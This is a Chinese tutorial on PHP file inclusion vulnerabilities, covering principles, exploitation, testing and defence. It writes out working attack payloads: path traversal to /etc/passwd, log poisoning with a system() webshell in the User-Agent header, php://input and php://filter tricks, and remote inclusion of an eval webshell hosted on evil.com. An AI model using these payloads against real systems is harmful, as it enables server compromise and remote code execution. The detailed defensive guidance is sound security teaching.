文件包含漏洞：从原理到实战的Web安全深度解析

2026/6/24 11:27:24

1. 文件包含漏洞：一个被低估的“入口”

在Web安全测试的日常里，我们常常把目光聚焦在SQL注入、XSS跨站脚本这些“明星”漏洞上，它们直接、后果明显，容易引起重视。但在我处理过的众多渗透测试和应急响应案例中，文件包含漏洞（File Inclusion Vulnerability）常常扮演着一个低调却极其危险的角色。它不像注入那样直接窃取数据，也不像XSS那样在用户端弹窗，但它能为攻击者打开一扇通往服务器深处的“任意门”，是权限提升和进一步渗透的绝佳跳板。很多开发者和初级安全工程师容易忽略对它的检查，认为只要不直接执行上传的文件就万事大吉，殊不知，通过包含（include）或读取（read）函数的路径操纵，攻击者能做的事情远超想象。

简单来说，文件包含漏洞允许攻击者通过Web应用程序的参数，动态包含并执行服务器上的文件。这通常发生在应用程序使用诸如include()、require()、include_once()、require_once()（PHP）、<%@ include file=（JSP）等函数时，未能对用户输入的文件路径或名称进行严格的过滤。根据包含的目标文件是否在服务器本地，它可以分为本地文件包含和远程文件包含。LFI（Local File Inclusion）让你能读取服务器本地的敏感文件（如/etc/passwd、配置文件、日志文件），而RFI（Remote File Inclusion）则更可怕，它允许包含并执行来自远程服务器（如攻击者控制的网站）的恶意代码，相当于直接获得了在目标服务器上执行任意代码的能力。

这个漏洞的“魅力”在于它的间接性和后续利用的无限可能。你可能只是通过一个不起眼的参数，读取到了一个数据库配置文件，从而拿到了数据库权限；或者通过包含日志文件，将PHP代码写入日志，再包含该日志文件从而执行代码。它考验的是攻击者对服务器环境、应用程序逻辑的熟悉程度和想象力。对于防守方而言，理解和防御文件包含漏洞，是构建纵深防御体系不可或缺的一环。接下来，我将深入拆解它的原理、利用手法、实战场景以及最关键的——如何从开发和运维两端彻底堵上这个漏洞。

2. 漏洞原理深度剖析：为什么“包含”会出问题？

要理解文件包含漏洞，必须从Web应用程序的动态特性说起。现代Web应用为了提升开发效率和代码复用，普遍采用模块化设计。例如，一个网站的头部导航栏（header）、尾部版权信息（footer）在很多页面都是相同的。聪明的做法不是在每个页面重复编写这些代码，而是将它们写成独立的文件（如header.php、footer.php)，然后在每个需要它们的页面中，使用包含函数将其引入。

2.1 动态包含的初衷与风险

设想一个简单的PHP页面page.php，它根据用户传递的参数来展示不同的内容模块：

<?php $module = $_GET['module']; // 用户通过 ?module=news 传递参数 include('/includes/' . $module . '.php'); ?>

开发者的本意是：当用户访问page.php?module=news时，程序会包含/includes/news.php文件并展示新闻内容；访问page.php?module=contact时，则包含/includes/contact.php。

这里的风险点完全集中在$module这个变量上。程序天真地相信，用户传入的module参数一定是一个存在于/includes/目录下的、合法的文件名（不带路径）。然而，攻击者不会这么守规矩。

2.2 路径遍历：LFI的核心

攻击者可以尝试传入../../../etc/passwd。拼接后，代码变成了：

include('/includes/../../../etc/passwd');

在操作系统的路径解析中，/includes/../等价于上一级目录。经过规范化，这个路径实际上指向了/etc/passwd。如果Web服务器进程（如www-data用户）有读取这个文件的权限，那么Linux系统的用户账户信息就会通过include函数被读取并输出到网页上。这就是一次典型的本地文件包含攻击。

注意：include和require在包含非PHP文件时，会直接将其内容作为文本输出。这对于读取配置文件、日志等纯文本文件是有效的。但如果包含的是一个PHP文件，该文件中的PHP代码会被执行。

2.3 远程文件包含：更致命的RFI

RFI的发生需要更宽松的条件：PHP配置中的allow_url_include选项必须为On（现代PHP版本默认均为Off，但历史遗留或配置不当的系统仍可能存在）。如果该选项开启，攻击者可以传入一个远程URL：

page.php?module=http://attacker.com/shell.txt

程序会尝试去包含http://attacker.com/shell.txt的内容。如果shell.txt中包含PHP代码（如<?php system($_GET[‘cmd’]);?>），那么这段代码会被下载并在当前服务器上执行。攻击者瞬间就获得了一个WebShell，可以执行任意系统命令。RFI的危害等级通常直接定为“严重”。

2.4 漏洞产生的根本原因

归结起来，产生文件包含漏洞的根本原因有三点：

不可信的用户输入直接拼接进文件路径：这是所有注入类漏洞的共性。程序没有对输入进行“消毒”。
使用了动态包含函数：include、require等函数本身是强大的，但错误的使用方式使其变得危险。
缺乏有效的路径过滤与白名单机制：程序没有限制可包含文件的目录范围，或者没有校验文件后缀。

理解了这个原理，我们就能明白，防御的核心不在于禁用这些有用的函数，而在于如何安全地使用它们。

3. 利用手法实战详解：从信息泄露到getshell

知道原理只是第一步，实战中如何利用才是关键。文件包含漏洞的利用方式多样，往往需要结合其他信息或技巧。下面我以PHP环境为例，分享几种经典的利用场景。

3.1 基础LFI：读取敏感文件

这是最直接的应用。目标是读取服务器上的敏感信息，为进一步攻击做准备。

系统文件：
- /etc/passwd：确认用户列表，寻找可登录用户。
- /etc/shadow：读取密码哈希（需要root权限，通常读不到，但一旦读到就是重大发现）。
- /proc/self/environ：包含当前进程的环境变量，可能泄露路径、密钥等信息。
- /proc/version//etc/issue：获取操作系统版本信息。
Web应用文件：
- ../config/database.php：读取数据库连接配置，直接获取数据库用户名、密码。
- ../.env：现代框架（如Laravel）的配置文件，常包含各种密钥。
- ../index.php：通过包含自身或其他源码文件，有时可以绕过某些过滤，或者直接查看源码寻找其他漏洞。
日志文件：这是LFI升级为代码执行的关键跳板。Web服务器（如Apache, Nginx）和应用程序都会生成日志。
- Apache访问日志：通常位于/var/log/apache2/access.log或/var/www/logs/access.log。
- Nginx访问日志：通常位于/var/log/nginx/access.log。
- SSH/FTP登录日志：/var/log/auth.log，/var/log/secure。

利用示例：假设存在漏洞的URL为http://target/vuln.php?file=welcome.php。尝试读取密码文件：http://target/vuln.php?file=../../../etc/passwd如果返回了用户列表，说明LFI存在，并且Web进程有权读取该系统文件。

3.2 LFI升级为代码执行：利用日志与协议

单纯的读取信息还不够，我们的目标是执行命令。当allow_url_include=Off时，可以通过一些“奇技淫巧”将LFI转化为RCE。

方法一：污染日志文件这是最经典的手法。攻击者无法直接上传文件，但可以让应用程序将PHP代码写入日志文件，然后去包含这个日志文件。

找到日志路径：通过LFI读取/proc/self/environ或猜测常见路径，确定访问日志的位置（例如/var/log/apache2/access.log）。
污染日志：在发起HTTP请求时，在User-Agent、Referer或请求路径中插入PHP代码。因为日志会记录这些字段。
```
GET /vuln.php?file=welcome.php HTTP/1.1 Host: target User-Agent: <?php system($_GET[‘c’]);?>
```
这段代码会被原样记录到access.log中。
包含日志文件：访问http://target/vuln.php?file=../../../var/log/apache2/access.log。此时，日志文件被包含，其中的PHP代码<?php system($_GET[‘c’]);?>会被执行。
执行命令：现在，通过参数c传递命令即可：http://target/vuln.php?file=../../../var/log/apache2/access.log&c=id。服务器会执行id命令并返回结果。

实操心得：现代Web服务器或安全软件可能会对日志中的特殊字符进行编码，导致<?php ?>标签被转义而失效。可以尝试使用短标签<?=或利用编码绕过。此外，日志文件通常很大，包含可能导致超时或内存耗尽。最好先通过LFI在日志文件末尾写入一句话WebShell，然后包含，这样更稳定。

方法二：利用PHP封装协议PHP提供了一系列php://封装协议，它们不是真实的文件，而是数据流。这在LFI利用中极为有用。

php://input：允许你读取POST请求的原始数据作为文件内容。需要allow_url_include=On。
- 利用方式：
```
POST /vuln.php?file=php://input HTTP/1.1 ... <?php system('id');?>
```
  服务器会执行POST body中的PHP代码。
php://filter：这是一个元封装器，用于在数据流打开时应用过滤器。它不需要allow_url_include=On，是LFI利用中最常用的协议。
- 读取源码：当直接包含PHP文件时，代码会被执行而非显示。使用filter可以读取源码。
```
vuln.php?file=php://filter/convert.base64-encode/resource=index.php
```
  这会将index.php的内容进行base64编码后输出。解码即可获得源代码，便于审计其他漏洞。
- 写入文件（结合其他漏洞）：通过filter的string.rot13、convert.base64-decode等过滤器，有时可以构造特殊内容，但通常需要其他条件配合，不如日志污染直接。

方法三：利用其他可写文件除了日志，任何Web应用有写入权限且能被包含的文件都可以成为目标。例如：

Session文件：PHP的Session数据通常存储在文件中（如/tmp/sess_[sessionid]）。如果攻击者能控制部分Session数据（例如，存在一个将用户输入存入$_SESSION的功能），就可以将PHP代码写入Session文件，然后包含它。需要知道Session ID。
上传文件的临时目录：某些情况下，即使上传功能检查了文件后缀，但临时文件可能在删除前被包含。
框架缓存文件：一些框架生成的缓存文件可能包含用户数据。

3.3 RFI的直球攻击

如果确认目标存在RFI（allow_url_include=On），利用起来就简单粗暴得多。

在攻击者控制的服务器上（如http://evil.com/）放置一个包含PHP代码的文本文件，例如shell.txt，内容为<?php eval($_POST[‘a’]);?>。
直接请求：http://target/vuln.php?file=http://evil.com/shell.txt。
目标服务器会下载并执行shell.txt中的代码，攻击者便可以用中国菜刀、蚁剑等工具连接http://target/vuln.php?file=http://evil.com/shell.txt，POST参数a=系统命令，即可获得一个交互式WebShell。

注意事项：RFI利用时，远程文件的内容必须能被目标服务器作为PHP代码解析。如果目标服务器对包含的URL有后缀检查（如要求.php），可以尝试在URL后加?或#来绕过，如http://evil.com/shell.txt?.php。或者，控制一个支持PHP解析的服务器来存放恶意文件。

4. 漏洞挖掘与测试方法论

在实际的渗透测试中，如何系统地发现文件包含漏洞？靠瞎猜参数名是不可行的。下面是我常用的一套流程。

4.1 参数识别与模糊测试

首先，需要找到所有可能接受文件路径的参数。

爬取与参数收集：使用爬虫工具（如Burp Suite的爬虫、gospider）遍历目标网站，收集所有URL和参数。关注参数名如：file,page,path,load,include,module,template,p,doc等。
静态分析：如果能有源码（白盒测试或部分泄露），直接搜索include,require,file_get_contents,fopen等函数，看其参数是否有用户输入来源（$_GET,$_POST,$_COOKIE,$_REQUEST）。
动态模糊测试：对收集到的参数进行测试。
- 基础测试：替换参数值为已知存在的本地文件路径，如../../../../etc/passwd。使用不同深度的../进行尝试。
- 协议测试：尝试使用php://filter/resource=/etc/passwd或php://input（POST数据）等。
- 空字节截断（PHP<5.3.4）：在路径后添加空字节%00，可以截断后缀检查。如../../../etc/passwd%00。虽然现在很少见，但测试老系统时值得一试。
- 路径拼接绕过：如果程序自动添加后缀（如.php），可以尝试使用../../../etc/passwd%00（空字节）或../../../etc/passwd?.php（问号）来绕过。

4.2 上下文分析与利用链构建

找到可疑点后，不要满足于读取一个/etc/passwd。要深入分析，构建利用链。

信息收集：利用LFI尽可能多地读取信息。
- Web配置：读取/etc/apache2/sites-available/000-default.conf，了解网站目录结构。
- 应用源码：用php://filter读取关键业务逻辑文件，寻找数据库配置、其他漏洞（如反序列化、命令注入）。
- 环境信息：读取/proc/self/environ，寻找数据库密码、密钥等。
寻找可写点：判断哪些路径是Web用户可写的。可以尝试包含/proc/self/cwd/（当前工作目录）下的文件，或者通过包含报错信息来泄露绝对路径。
尝试升级到RCE：
- 检查/proc/sys/kernel/randomize_va_space值，如果是0，可能未开启地址空间随机化（ASLR），有利于某些高级利用（如通过/proc/self/mem修改内存），但这属于较深领域。
- 首选日志污染：尝试包含各种日志文件，并在请求中注入代码测试。
- 测试Session文件包含：如果网站使用Session，尝试固定Session ID，并寻找将输入存入Session的功能点。

4.3 自动化工具辅助

手工测试是基础，但结合工具能提升效率。

Burp Suite Intruder：对参数进行批量模糊测试，使用包含常见路径和绕过技巧的字典。
ffuf / gobuster：用于模糊测试参数值，速度很快。
专用扫描器：像Liffy这样的开源工具可以自动化测试LFI并尝试多种利用方式。
自定义脚本：根据目标情况，编写Python脚本自动化测试日志污染、Session包含等复杂流程。

踩坑记录：在一次测试中，我发现一个参数?lang=存在LFI，但只能读取*.php文件。程序自动添加了.php后缀。我尝试了../../../etc/passwd%00无效（PHP版本高）。最终发现，程序在包含前对路径做了realpath()解析，但解析后仍然拼接了后缀。我通过php://filter/convert.base64-encode/resource=../../../etc/passwd成功读取，因为resource=后面的部分被当作一个整体，后缀拼接在了整个协议字符串后面，而php://filter协议忽略了它。这说明，面对过滤，需要多角度尝试不同的协议和技巧。

5. 防御方案：从开发到部署的全链路防护

修复文件包含漏洞，必须从软件开发的生命周期开始，贯穿至部署运维。单一措施往往不够，需要层层设防。

5.1 安全开发实践（根本解决）

这是最有效的一环，需要在编码阶段就杜绝漏洞。

避免动态包含用户输入：这是黄金法则。如果可能，尽量使用静态包含或安全的映射方式。

使用白名单机制：如果动态包含无法避免，必须使用白名单。

// 错误示范 $page = $_GET['page']; include($page . '.php'); // 正确示范（白名单） $allowed_pages = ['home', 'news', 'contact', 'about']; $page = $_GET['page']; if (in_array($page, $allowed_pages)) { include($page . '.php'); } else { include('error.php'); // 或直接die('Invalid page'); }

白名单内的值应该是简单的标识符，而不是路径。

严格限制路径：如果必须允许一定程度的动态性，应将包含文件限制在特定目录内，并使用basename()函数去除路径。
```
$file = basename($_GET['file']); // 移除所有路径信息，只保留文件名 include('/safe_directory/' . $file . '.php');
```
同时，确保safe_directory目录下没有敏感文件。
禁用危险函数/配置（辅助措施）：
- 在php.ini中设置allow_url_include = Off（默认已是Off）。这是阻止RFI的最直接方法。
- 考虑禁用allow_url_fopen，但这会影响正常的远程文件读取功能，需权衡。
- 在代码层面，避免使用include/require包含来自用户输入的变量。如果框架允许，可以重写或监控这些函数。

5.2 安全配置与加固（运维层面）

开发可能遗留问题，运维需要兜底。

最小权限原则：运行Web服务的用户（如www-data,nginx）应该拥有尽可能少的权限。
- 不能读取/etc/shadow、/root等敏感目录。
- Web根目录以外的文件，该用户应无权访问。可以通过操作系统的文件权限（chmod, chown）严格控制。
修改日志文件权限和位置：
- 将Web日志文件设置为仅对root用户可读。chmod 640 /var/log/apache2/access.log，chown root:www-data /var/log/apache2/access.log。
- 将日志文件移到Web根目录之外，或者使用一个难以猜测的随机名称。
配置Web服务器：
- Apache：使用php_admin_value在虚拟主机配置中强制关闭allow_url_include。
```
<VirtualHost *:80> ServerName myapp.local php_admin_value allow_url_include Off </VirtualHost>
```
- Nginx + PHP-FPM：在PHP-FPM的池配置（www.conf）中设置：
```
php_admin_value[allow_url_include] = Off
```
部署Web应用防火墙：在应用前端部署WAF，可以配置规则拦截包含../、php://、http://等特征的恶意请求。但WAF是缓解措施，不能替代代码修复。

5.3 安全测试与监控

防御是一个持续的过程。

代码审计：在开发流程中引入安全代码审计（SAST），自动或人工检查代码中是否存在不安全的文件包含函数调用。
渗透测试：定期对线上系统进行黑盒/白盒渗透测试，主动寻找包括文件包含在内的漏洞。
日志监控：集中监控Web访问日志和系统日志，设置告警规则，对频繁出现路径遍历特征（如大量../）的请求进行告警和调查。

文件包含漏洞就像系统的一道暗门，它可能看起来不起眼，但一旦被攻击者发现并利用，就能长驱直入。它的防御需要开发者和运维人员的共同重视。开发者要写出安全的代码，从源头上关门；运维者要做好系统加固，让即使存在暗门也难以被推开。在安全的世界里，没有一劳永逸的解决方案，只有持续的关注、学习和实践，才能构建起真正有效的防线。